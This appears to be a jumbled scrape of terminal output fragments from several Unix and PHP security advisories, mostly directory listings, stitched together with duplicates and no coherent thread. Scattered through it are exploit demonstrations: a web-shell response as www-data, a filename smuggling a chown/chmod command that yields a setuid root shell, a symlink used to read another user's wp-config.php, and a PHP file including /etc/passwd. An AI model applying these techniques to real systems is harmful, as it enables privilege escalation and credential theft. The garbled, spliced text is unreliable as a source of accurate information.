drwxr/xr/x
--------------------/Response/--------------------
[...]
<br>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
> --------------------/Response/--------------------
> [...]
> <br>
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
guest-dojMxl@vb-mint-12-x64 ~ $ whoami
guest-dojMxl
guest-dojMxl@vb-mint-12-x64 /home/jwalton $ cd /home/
guest-dojMxl@vb-mint-12-x64 /home $ ls -al
total 12
drwxr-xr-x 3 root root 4096 2012-05-05 16:29 .
drwxr-xr-x 23 root root 4096 2012-05-05 16:32 ..
drwxr-xr-x 5 jwalton jwalton 4096 2012-05-05 16:35 jwalton
guest-dojMxl@vb-mint-12-x64 ~ $ cd /home/jwalton/
guest-dojMxl@vb-mint-12-x64 /home/jwalton $ ls -al
total 28
mail.recon.cx
nobody@mail:~$ pwd
/
nobody@mail:~$ cd /home ; ls -l
total 36
drwxr-xr-x 3 cade cade 4096 Mar 6 2011 cade
drwxr-xr-x 17 hfortier hfortier 4096 Jan 18 18:21 hfortier
drwxr-xr-x 3 dma dma 4096 Feb 9 2011 dma
drwxr-xr-x 3 jamie jamie 4096 Jan 18 23:12 jamie
drwxr-xr-x 4 msf msf 4096 Aug 25 2010 msf
drwxr-xr-x 4 tina tina 4096 Jun 6 2011 tina
It turns out that he was showing how a root shell can be created:
[user1@testing574 tmp]$ ls -al
total 28
drwxrwxrwt 4 root root 4096 May 21 08:41 .
drwxr-xr-x 24 root root 4096 May 19 16:57 ..
-rw-rw-r-- 1 user1 user1 0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell;
drwx------ 2 root root 4096 May 21 08:41 backupPdUzR4
-rwsr-xr-x 1 root root 5056 May 21 08:41 shell
-rw-rw-r-- 1 user1 user1 89 May 21 08:33 shell.c
Script started on Tue Dec 08 23:35:31 2009
### Starting with a clean directory
Don't Panic! # ls -al
total 6
drwxr-xr-x 2 root root 2 Dec 8 23:35 .
drwxrwxrwt 6 root sys 7 Dec 8 23:28 ..
### Untar the new SRR script
Don't Panic! # tar xf ../UNIX_51-15Dec2009.tar
dcarey@drewcarey.com [~/public_html]# ln -s /home/bbarker/public_html/wp-config.php vuln
dcarey@drewcarey.com [~/public_html]# ls -lsah
total 20K
4.0K drwxr-x--- 3 dcarey nobody 4.0K Feb 17 22:25 ./
4.0K drwxr-xr-x 9 dcarey dcarey 4.0K Feb 17 22:23 ../
4.0K drwxr-xr-x 2 dcarey dcarey 4.0K Feb 17 22:17 cgi-bin/
8.0K -rw-r--r-- 1 dcarey dcarey 4.1K Feb 10 18:16 default.html
0 lrwxrwxrwx 1 dcarey dcarey 39 Feb 17 22:25 vuln -> /home/bbarker/public_html/wp-config.php
However, when viewed via Apache our file is shown in full.
Using PHP 5.2.6, as a Apache module can bypass many security points. To understand this issue, first we need know, where is the problem.
127# cd /www/trafka
127# ls -la
total 12
drwxr-xr-x 2 www www 512 Sep 10 03:49 .
drwxr-xr-x 4 www www 512 Sep 10 03:41 ..
- -rw-r--r-- 1 www www 26 Sep 10 03:49 .htaccess
- -rw-r--r-- 1 www www 33 Sep 10 03:49 not.php
- -rw-r--r-- 1 www www 107 Sep 10 03:49 pufff.php
- -rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php
Server built: Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386
127# ls -la
total 8
drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .
drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..
-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess
-rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................
-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php
127# ps -aux -p 617
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
> $ mkdir foo
> $ cd foo
> $ echo hi > bar
> $ ls -la
> total 12
> drwxr-xr-x 2 user1 group1 4096 2009-10-27 16:22 ./
> drwx------ 57 user1 group1 4096 2009-10-27 16:22 ../
> -rw-r--r-- 1 user1 group1 3 2009-10-27 16:22 bar
> $ chmod 000 .
> $ echo bye > bar
> -bash: bar: Permission denied
# echo "safe" > /dir/file.txt
# chmod 0666 /dir/file.txt
# ls -al /dir
total 12
drwx------ 2 root root 4096 2009-10-29 00:28 .
drwxr-xr-x 27 root root 4096 2009-10-29 00:28 ..
-rw-rw-rw- 1 root root 7 2009-10-29 00:43 file.txt
# cat /dir/file.txt
safe
Now user "nobody" cannot read or write this file:
> # echo "safe" > /dir/file.txt
> # chmod 0666 /dir/file.txt
> # ls -al /dir
> total 12
> drwx------ 2 root root 4096 2009-10-29 00:28 .
> drwxr-xr-x 27 root root 4096 2009-10-29 00:28 ..
> -rw-rw-rw- 1 root root 7 2009-10-29 00:43 file.txt
> # cat /dir/file.txt
> safe
>
> Now user "nobody" cannot read or write this file:
Apache 2.2.4 and PHP 5.2.4. Let's see folder "/narkotyk" in localhost:82.
cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
- -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
- -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
- -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php
cxib# cat file1.php
<? include("/etc/passwd"); ?>
$ mkdir foo
$ cd foo
$ echo hi > bar
$ ls -la
total 12
drwxr-xr-x 2 user1 group1 4096 2009-10-27 16:22 ./
drwx------ 57 user1 group1 4096 2009-10-27 16:22 ../
-rw-r--r-- 1 user1 group1 3 2009-10-27 16:22 bar
$ chmod 000 .
$ echo bye > bar
-bash: bar: Permission denied
> # echo "safe" > /dir/file.txt
> # chmod 0666 /dir/file.txt
> # ls -al /dir
> total 12
> drwx------ 2 root root 4096 2009-10-29 00:28 .
> drwxr-xr-x 27 root root 4096 2009-10-29 00:28 ..
> -rw-rw-rw- 1 root root 7 2009-10-29 00:43 file.txt
> # cat /dir/file.txt
> safe
>
> Now user "nobody" cannot read or write this file:
|
